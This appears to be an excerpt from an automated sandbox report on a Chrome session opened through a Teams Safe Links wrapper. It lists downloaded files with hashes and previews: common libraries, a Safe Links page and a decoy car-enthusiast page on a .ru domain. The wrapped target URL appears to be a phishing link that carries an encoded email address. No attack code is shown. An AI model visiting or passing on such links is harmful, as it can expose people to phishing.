                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                  Category:downloaded
                                  Size (bytes):1239
                                  Entropy (8bit):4.689362533042594
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:2ECDE8CC161C1ED453B9FC02E0DD4DF5
                                  SHA1:6257C49ED6712030542002E9F5C1FE82CF757721
                                  SHA-256:0DB827FF0292B89CD1D6D908732382EDD8CBF1C0D04BF74F1482C08DA6AE3735
                                  SHA-512:8C388056655A91CD84C37C3217C65FCE003F7B5B845D6D11FE83C14CFF5E721D13C6F75FD28690C13900AD372D997C06296B8B1E4C95660554618F36D35CC49A
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu
                                  Preview:.<!DOCTYPE html>..<html>..<head>.. <link rel="stylesheet" type="text/css" href="atp.css?v=3">.. <script src="atp-i18n.js?v=3"></script>.. <script src="atp.js?v=11"></script>.. <meta charset="UTF-8" name="viewport" content="width=device-width" />.. <title id="atp-title"></title>..</head>..<body>.. <div class="atp" role="main">.. <div class="atp-content">.. <img id="atp-error-image" class="atp-hidden" src="../assets/1/Unable_check_Saftey_Link.svg">.. <div class="atp-h1">.. <div tabindex="0" id="atp-message">.. <span id="atp-line-one"></span>.. <span class="dot showone">.</span>.. <span class="dot showtwo">.</span>.. <span class="dot showthree">.</span>.. </div>.. </div>.. <a href="/" id="skip-validation-link" class="atp-hidden">.. <button id="skip-validation-btn" class="atp-button" type="button">.. Skip validation.. </button>.. </a>.. <div id="atp-line-three">..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 73 x 68, 8-bit/color RGB, non-interlaced
                                  Category:dropped
                                  Size (bytes):61
                                  Entropy (8bit):3.896188229201896
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:F1200771B518F1B7E8ACF428BF4AC6B3
                                  SHA1:47FCF22B1B5E186D408E812AFA1173CF31FEABCB
                                  SHA-256:36D0B94A30C43897839127C3EB7A418789898164BBACEEE87D460DA4269EF6D4
                                  SHA-512:C3D952F498F9AC79C80E95B8C1D49036684114BB6EC574D2AF6542D8D0CC7B301F640ED563C62F60AB1FCF69380695534D6E95E17CFE145CB2783E85D5A9D7E7
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:.PNG........IHDR...I...D.....B..U....IDAT.....$.....IEND.B`.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Unicode text, UTF-8 text, with very long lines (65306)
                                  Category:downloaded
                                  Size (bytes):155845
                                  Entropy (8bit):5.0596333050371385
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:ABE91756D18B7CD60871A2F47C1E8192
                                  SHA1:7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
                                  SHA-256:7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
                                  SHA-512:BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css
                                  Preview:@charset "UTF-8";/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65451)
                                  Category:dropped
                                  Size (bytes):89476
                                  Entropy (8bit):5.2896589255084425
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                  SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                  SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                  SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (65447)
                                  Category:downloaded
                                  Size (bytes):89501
                                  Entropy (8bit):5.289893677458563
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:HTML document, ASCII text, with very long lines (505), with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):6752
                                  Entropy (8bit):4.724859605658999
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:E2ECC523E5997F0C70DC8AB9195D6B92
                                  SHA1:615A7BFF7D9EDA4B43E614B045B688D69FD2405B
                                  SHA-256:BCF1BD03641A514C961ECB19DB5631ABE78F5A961707C094AA26EF337CE10DF4
                                  SHA-512:18592BCB636D8B748BB59981977E22A74038603FDF83947886FFCA26C64811BCE72DA609EC91B7F85F6E1783A2251AC7B8D7826600BEAF68FCB42EE1F728D921
                                  Malicious:false
                                  Reputation:unknown
                                  Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Exotic Car Enthusiasts - decoestilismoko.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> ..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark">.. <div class="container">.. <a class="navbar-brand" href="https://decoestilismoko.ru/#">.. <i class="fas fa-car"></i> Exotic Car Enthusiasts .. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">.. <span class="navbar-toggl
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:XML 1.0 document, ASCII text
                                  Category:downloaded
                                  Size (bytes):263
                                  Entropy (8bit):5.629579629274682
                                  Encrypted:false
                                  SSDEEP:
                                  MD5:2280DDFBC29670EA83D5E61AF659E5CC
                                  SHA1:64008F38173001A17DBC583B0FBA9F0E4EBA010A
                                  SHA-256:5D66CA9FF0C976148A894E6B6F597D6E3566B32D085076928E8D4DC79A2C2906
                                  SHA-512:4FAD39F5599F46A8DF7E156747D953A8DC2E98DC070A18A928538C9B82EB5403762ED1F8D94A5EAEC747D5C4BFBEA4CEF33ABD58DDB6CE187E3DA0E6CA68C309
                                  Malicious:false
                                  Reputation:unknown
                                  URL:https://cm-email-assets.s3.amazonaws.com/favicon.ico
                                  Preview:<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>GW7GZ41V62WRZ2Z6</RequestId><HostId>Boa/QG8AEBGZLpw4QO8o/ZEEymDTHTPhVroVcpDU154522AdqbKd/CDGfsUzXiY0wicRJjk8lfRB/NBcsGgdg05ldpdPWfX5</HostId></Error>
                                  No static file info